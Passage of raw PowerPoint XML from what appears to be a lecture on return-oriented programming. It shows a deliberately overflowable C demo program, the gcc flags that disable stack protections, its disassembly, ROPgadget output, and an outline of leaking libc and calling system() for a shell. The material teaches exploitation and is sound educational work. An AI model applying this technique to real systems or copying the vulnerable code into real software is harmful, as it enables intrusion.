      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="200017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ROP Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle: Rounded Corners 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D936CF64-95DD-6688-B9F3-AADCC2536639}"/>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n-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>stdlib.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>int main(int </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>, char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>[], char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>enp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>[200];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    puts("Enter your message:");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>("&gt; ");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fflush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(buf,500,stdin);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>("You said: %s\n",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>    return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle: Rounded Corners 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BFE493D-B275-A4D4-AA36-95085CA19996}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5316625" y="608069"/>
            <a:ext cx="6265003" cy="5642594"/>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t>push   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>rbp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>mov    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1"/>
              <a:t>rbp,rsp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>sub    rsp,0xf0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>call   0x401070 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>puts@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>lea    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>,[rbp-0xd0]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mov    esi,0x1f4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mov    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rdi,rax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>call   0x401090 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fgets@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>... </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle: Rounded Corners 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B071CAEE-0BC4-DA4D-F6A3-17504863A2FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1706724" y="3631162"/>
            <a:ext cx="1407368" cy="3576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8AF566A-4FA5-C299-69FB-F3829B28CC7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1706724" y="4735283"/>
            <a:ext cx="1881673" cy="3343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F8AC023-C9C1-1323-5DDA-DBC3F190E0CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457560" y="2379302"/>
            <a:ext cx="1951653" cy="37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016B1D-E659-107E-E17E-D53DA2C79698}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457560" y="3825548"/>
            <a:ext cx="2114939" cy="3110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73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ROP Exploitation (cont.)</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200" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -O3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bof_demo.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>bof_demo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> -D_FORTIFY_SOURCE=0 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>-stack-protector -no-pie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 5" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2A0B4EA-D734-A937-E92A-3B34FBFB6999}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="2455" t="15230" r="6710" b="35526"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1636006" y="3128303"/>
            <a:ext cx="8919960" cy="2744330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196623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a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>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200"/>
              <a:t>Create a ROP chain to hijack control flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Leverage ROP Chain to leak the base address of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t> at the time of execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Do some Math and calculate system() address in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1"/>
              <a:t>libc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Execute second stage of the payload and obtain shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368484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8838095" cy="4043765"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>ROPGadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> --binary ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>bof_demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>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872462" y="2527777"/>
            <a:ext cx="8434253" cy="3495125"/>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a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x40126b : pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x40126f : pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ; pop r14 ; pop r15 ; ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x401113 : pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ; ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x401273 : pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ; ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x401271 : pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ; pop r15 ; ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x40126d : pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ; pop r13 ; pop r14 ; pop r15 ; ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>0x40101a : ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="253004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5" cy="741765"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1">
                <a:ea typeface="+mn-lt"/>
